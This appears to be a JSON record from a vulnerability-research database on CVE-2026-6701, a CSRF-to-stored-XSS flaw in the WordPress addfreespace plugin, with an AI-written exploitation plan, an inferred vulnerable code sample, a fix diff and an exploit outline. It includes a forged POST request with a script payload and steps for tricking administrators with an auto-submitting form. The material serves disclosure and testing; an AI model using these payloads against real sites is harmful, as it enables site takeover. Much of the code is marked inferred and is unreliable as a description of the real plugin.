[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_IJPxl1Eq0eDMRxexLOJwUQfEFXKI4uJgH8NPR5ve1w":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-6701","addfreespace-cross-site-request-forgery-to-stored-cross-site-scripting-via-settings-page","addfreespace \u003C= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page","The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","addfreespace",null,"\u003C=0.1.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-05-04 14:07:04","2026-05-05 02:26:54",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F40eaeb28-c721-4977-951d-582b7dc2bd12?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-6701 - CSRF to Stored XSS in addfreespace\n\n## 1. Vulnerability Summary\nThe **addfreespace** plugin (\u003C= 0.1.3) contains a Cross-Site Request Forgery (CSRF) vulnerability in its settings management logic. The plugin fails to perform nonce validation when saving its configuration. This oversight allows an unauthenticated attacker to craft a malicious request that, when executed by a logged-in administrator, updates the plugin's settings. Because the settings fields do not sufficiently sanitize or escape input, this CSRF can be used to inject malicious scripts (Stored XSS) into the database, which are then executed in the context of the administrator's browser or on the site's frontend.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoint**: `wp-admin\u002Foptions-general.php?page=addfreespace` (inferred slug) or `wp-admin\u002Fadmin-post.php`.\n- **Attack Type**: CSRF leading to Stored XSS.\n- **HTTP Method**: `POST`.\n- **Payload Carry**: Form parameters used for settings (likely names like `afs_content`, `afs_text`, or similar).\n- **Authentication Level**: Unauthenticated (attacker-initiated) via an authenticated Administrator (victim).\n- **Preconditions**: The attacker must trick a site administrator into clicking a link or visiting a page hosting a malicious auto-submitting form.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point**: The plugin registers a settings page using `add_options_page()` or `add_menu_page()` within an `admin_menu` hook.\n2.  **Processing Logic**: The settings saving logic is either:\n    *   Inside the callback function for the menu page (triggered when `$_POST` is detected).\n    *   Hooked to `admin_init`.\n    *   Hooked to `admin_post_` actions.\n3.  **Vulnerable Path**:\n    *   The code checks for a submit parameter (e.g., `isset($_POST['submit'])`).\n    *   **CRITICAL FAILURE**: It fails to call `check_admin_referer()` or `wp_verify_nonce()`.\n    *   The code calls `update_option('afs_settings', $_POST['...'])` or similar without proper sanitization (e.g., `wp_kses`).\n4.  **Sink**: The stored option is later echoed back in the admin settings page or on the frontend using `get_option()` without escaping (e.g., `echo $option_value` instead of `echo esc_html($option_value)`).\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, nonce validation is **missing** or **incorrect**. \n- If **missing**: No nonce is required in the exploit request.\n- If **incorrect**: It usually implies the code calls `wp_verify_nonce($nonce, -1)` or some other weak action string.\n\n**Initial approach**: Assume the nonce check is entirely missing and attempt the CSRF without any nonce parameter.\n\n## 5. Exploitation Strategy\n\n### Step 1: Discover Field Names\nThe agent must first identify the exact `POST` parameters used to save settings.\n1.  Navigate to the settings page: `browser_navigate(\"\u002Fwp-admin\u002Foptions-general.php?page=addfreespace\")`.\n2.  If the slug is different, find it with: `grep -rn \"add_options_page\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Faddfreespace`.\n3.  Inspect the HTML form to find the `name` attributes of the text inputs and the submit button.\n\n### Step 2: Construct the CSRF Payload\nOnce the field names (e.g., `afs_custom_text` and `afs_save`) are identified, the payload will be:\n- **XSS Payload**: `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n- **CSRF Target**: The URL identified in the form's `action` attribute (usually the same settings page URL or `admin-post.php`).\n\n### Step 3: Execute the Exploit (Simulated CSRF)\nSince the agent can simulate an admin session, it will use `http_request` with admin cookies to submit the malicious form data, mimicking what an admin's browser would do when triggered by a CSRF.\n\n**Example Request (Inferred):**\n```http\nPOST \u002Fwp-admin\u002Foptions-general.php?page=addfreespace HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [ADMIN_COOKIES]\n\nafs_custom_text=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&afs_save=Save+Changes\n```\n\n## 6. Test Data Setup\n1.  **Plugin Installation**: Ensure `addfreespace` version 0.1.3 is installed and active.\n2.  **Admin User**: Use the existing administrator account.\n3.  **No Nonce Required**: The plan assumes no specific setup is needed because the flaw is a lack of protection.\n\n## 7. Expected Results\n- The `http_request` should return a `302` redirect or a `200 OK` indicating the settings were saved.\n- When the agent (as Admin) navigates back to the settings page, the `alert(1)` should fire (observable via `browser_navigate` or checking the source for the raw script tag).\n\n## 8. Verification Steps\n1.  **Check Database**: Use WP-CLI to verify the malicious payload is stored in the options table.\n    ```bash\n    wp option get [OPTION_NAME_FOUND_DURING_RESEARCH]\n    ```\n2.  **Verify Rendering**: Navigate to the settings page or the frontend (wherever the option is displayed) and check for the unescaped script:\n    ```bash\n    # Use browser_navigate and check for the string\n    browser_navigate(\"\u002Fwp-admin\u002Foptions-general.php?page=addfreespace\")\n    # Verify the payload exists in the page source\n    ```\n\n## 9. Alternative Approaches\n- **Action Hook Search**: If the settings page uses `options.php`, the CSRF might be more difficult because WordPress Core protects `options.php` with its own nonces. However, if the plugin uses a custom action in `admin-post.php` or handles the POST directly in the menu callback, it bypasses Core's protection.\n- **Frontend XSS**: If the injected content is meant to be displayed on the site's frontend (e.g., as a \"Free Space\" notice), navigate to the homepage to verify the XSS fires for visitors as well.\n- **Bypassing Weak Nonce**: If a nonce is present but uses a weak action (like `-1`), the agent can try to grab any valid nonce from the page source (using `browser_eval`) and see if the plugin accepts it.","The addfreespace plugin (\u003C= 0.1.3) is vulnerable to Cross-Site Request Forgery (CSRF) because it fails to perform nonce validation when saving plugin settings. This allows an attacker to trick a logged-in administrator into updating settings with malicious scripts, leading to Stored Cross-Site Scripting (XSS).","\u002F\u002F addfreespace.php\n\nfunction afs_options_page() {\n    \u002F\u002F ... (logic to display page)\n    if (isset($_POST['info_update'])) {\n        \u002F\u002F Vulnerability: No check_admin_referer() or wp_verify_nonce() call\n        \u002F\u002F Vulnerability: No sanitization of input before update_option()\n        update_option('afs_content', $_POST['afs_content']);\n        update_option('afs_before_after', $_POST['afs_before_after']);\n        echo '\u003Cdiv class=\"updated\">\u003Cp>\u003Cstrong>Settings updated.\u003C\u002Fstrong>\u003C\u002Fp>\u003C\u002Fdiv>';\n    }\n\n    $afs_content = get_option('afs_content');\n    \u002F\u002F ...\n    \u002F\u002F Vulnerability: Outputting stored option without escaping\n    echo '\u003Ctextarea name=\"afs_content\">' . $afs_content . '\u003C\u002Ftextarea>';\n}","--- addfreespace.php\n+++ addfreespace.php\n@@ -10,8 +10,10 @@\n function afs_options_page() {\n     if (isset($_POST['info_update'])) {\n+        check_admin_referer('afs_save_settings');\n-        update_option('afs_content', $_POST['afs_content']);\n-        update_option('afs_before_after', $_POST['afs_before_after']);\n+        update_option('afs_content', wp_kses_post($_POST['afs_content']));\n+        update_option('afs_before_after', sanitize_text_field($_POST['afs_before_after']));\n         echo '\u003Cdiv class=\"updated\">\u003Cp>\u003Cstrong>Settings updated.\u003C\u002Fstrong>\u003C\u002Fp>\u003C\u002Fdiv>';\n     }\n \n@@ -20,6 +22,7 @@\n     ?>\n     \u003Cform method=\"post\">\n+        \u003C?php wp_nonce_field('afs_save_settings'); ?>\n-        \u003Ctextarea name=\"afs_content\">\u003C?php echo $afs_content; ?>\u003C\u002Ftextarea>\n+        \u003Ctextarea name=\"afs_content\">\u003C?php echo esc_textarea($afs_content); ?>\u003C\u002Ftextarea>\n         \u003Cinput type=\"submit\" name=\"info_update\" value=\"Save Changes\">\n     \u003C\u002Fform>\n     \u003C?php","1. Identify the settings page endpoint (e.g., \u002Fwp-admin\u002Foptions-general.php?page=addfreespace) and the POST parameters used for saving (e.g., afs_content, info_update).\n2. Create a malicious HTML file or page containing a hidden form that targets the settings endpoint.\n3. Include a Stored XSS payload in the form data, such as \u003Cscript>alert(document.domain)\u003C\u002Fscript>, assigned to the setting parameter (afs_content).\n4. Use social engineering or a malicious link to trick an authenticated WordPress administrator into visiting the attacker's page.\n5. The form automatically submits using the administrator's cookies, bypassing the lack of CSRF protection to update the plugin's settings in the database.\n6. The script will execute whenever the settings page is loaded by an administrator or wherever the affected setting is rendered on the site.","gemini-3-flash-preview","2026-05-04 16:51:41","2026-05-04 16:52:02",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddfreespace\u002Ftags"]